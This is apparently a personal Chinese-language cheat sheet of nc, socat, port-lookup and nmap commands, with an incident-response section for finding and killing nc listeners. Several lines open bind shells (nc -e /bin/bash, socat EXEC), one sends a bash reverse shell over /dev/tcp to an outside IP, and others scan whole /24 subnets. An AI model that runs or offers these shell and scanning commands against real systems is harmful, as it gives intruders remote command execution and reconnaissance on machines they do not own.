命令
nc、ls、待补充
nc:
常用:
1
2
3
4
5
6
|
nc -l -p 6666 -e "/bin/bash -i"
nc -l -p 6666 -e /bin/bash 2>&1
bash -i > /dev/tcp/81.X.X.X/6666 0>&1 2>&1
|
1
2
3
4
5
6
7
|
nc -l -p 6666 -e "/bin/bash -i" -s 192.168.1.100
nc -l -p 8080 -v 2>&1 | tee -a access.log
|
| 用途 |
命令示例 |
说明 |
| 临时聊天 |
nc -l -p 8080 + nc <IP> 8080 |
双向文本通信 |
| 文件传输(发送→接收) |
nc -l -p 8080 > file + nc <IP> 8080 < file |
替代SCP/FTP |
| 反向Shell |
nc -l -p 8080 -e /bin/bash + nc <IP> 8080 |
高风险!仅测试用 |
| 端口扫描 |
nc -zv <IP> 8080 |
检查端口状态 |
| HTTP调试 |
nc -l -p 8080 + curl http://<IP>:8080 |
查看原始HTTP请求 |
| TCP代理 |
`nc -l -p 8080 |
nc <目标IP> 80` |
| 十六进制调试 |
`nc -l -p 8080 |
hexdump -C` |
| 持久监听 |
while true; do nc -l -p 8080; done |
支持多次连接 |
| SSL加密通信 |
ncat -l -p 8080 --ssl + ncat <IP> 8080 --ssl |
需安装ncat |
注:nc -l -p 8080 -e “/bin/bash -i” //j交互模式
nc -l -p 8080 -e “/bin/bash -i 2>&1” //全回显,2>&1 表示将 标准错误(stderr) 重定向到 标准输出(stdout),确保错误信息也能回显。
| 需求 |
命令 |
简单回显(nc) |
nc -l -p 8080 -e "/bin/bash -i 2>&1" |
完整终端支持(nc) |
nc -l -p 8080 -e "script -q -c '/bin/bash -i' /dev/null 2>&1" |
最佳兼容性(socat) |
socat TCP-LISTEN:8080,reuseaddr,fork EXEC:"/bin/bash -i",pty,stderr |
应急:
1
2
3
4
5
6
7
8
9
10
11
| # 查找 nc 进程
ps aux | grep 'nc -l'
# 直接用 pkill 终止所有 nc 进程
pkill -f 'nc -l'
# 杀死进程(假设进程ID是 12345)
kill 12345
# 或者强制杀死
kill -9 12345
|
ls:
1
2
3
4
5
6
7
|
netstat -ano | grep ':8080'
ss -tulnp | grep ':8080'
lsof -i :8080
|
| 步骤 |
命令 |
用途 |
| 1. 查找占用 8080 的 PID |
`sudo ss -tulnp |
grep ‘:8080’或sudo lsof -i :8080` |
| 2. 定位可执行文件 |
sudo ls -l /proc/<PID>/exe 或 sudo readlink -f /proc/<PID>/exe |
找到程序的真实路径 |
| 3. 检查工作目录 |
sudo ls -l /proc/<PID>/cwd |
查看程序运行时的工作目录 |
nmap:
扫描c段
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| #基础命令--列出存活主机及其开放端口(默认扫描 1000 个常用端口)
nmap 192.168.1.0/24
#快速扫描
nmap -sn 192.168.1.0/24
#扫描c段存活的全部端口
nmap -p 1-65535 -T4 -A -v 192.168.1.0/24
-sV:探测服务版本
--open:仅显示开放端口
-oN:输出文本报告
|